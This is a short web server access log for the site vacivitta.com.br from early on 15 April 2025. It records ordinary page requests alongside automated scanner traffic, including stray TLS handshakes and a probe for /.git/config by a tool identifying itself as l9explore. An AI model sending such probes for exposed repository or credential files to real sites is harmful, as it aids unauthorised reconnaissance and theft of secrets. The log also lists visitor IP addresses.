51.178.236.244 - - [15/Apr/2025:02:42:11 -0300] "\x16\x03\x03\x01\xa8\x01" 404 - "-" "-"
vacivitta.com.br:80
51.178.236.253 - - [15/Apr/2025:02:42:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
vacivitta.com.br:80
203.176.134.107 - - [15/Apr/2025:02:46:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
91.196.152.35 - - [15/Apr/2025:02:51:12 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
vacivitta.com.br:80
20.221.68.115 - - [15/Apr/2025:02:51:23 -0300] "MGLNDD_162.240.168.168_80\n" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:02:56:35 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
78.145.122.112 - - [15/Apr/2025:02:59:36 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:03:06:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:03:21:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
221.139.231.241 - - [15/Apr/2025:03:25:06 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
34.76.203.56 - - [15/Apr/2025:03:28:42 -0300] "GET / HTTP/1.1" 200 488 "-" "python-requests/2.32.3"
vacivitta.com.br:80
185.218.86.4 - - [15/Apr/2025:03:28:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:03:40:35 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:03:46:12 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
64.62.197.42 - - [15/Apr/2025:03:51:38 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:04:00:07 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:04:11:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.34 - - [15/Apr/2025:04:22:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
170.39.218.2 - - [15/Apr/2025:04:24:12 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
170.39.218.2 - - [15/Apr/2025:04:24:12 -0300] "GET / HTTP/1.1" 404 - "-" "-"
vacivitta.com.br:80
170.39.218.2 - - [15/Apr/2025:04:24:12 -0300] "GET / HTTP/1.1" 200 488 "-" "l9tcpid/v1.1.0"
vacivitta.com.br:80
170.39.218.2 - - [15/Apr/2025:04:24:13 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "l9explore/1.2.2"
vacivitta.com.br:80
80.82.77.202 - - [15/Apr/2025:04:35:09 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Linux; Android 9; LM-G710) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
vacivitta.com.br:80
5.183.209.244 - - [15/Apr/2025:04:35:35 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [15/Apr/2025:04:39:52 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [15/Apr/2025:04:41:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
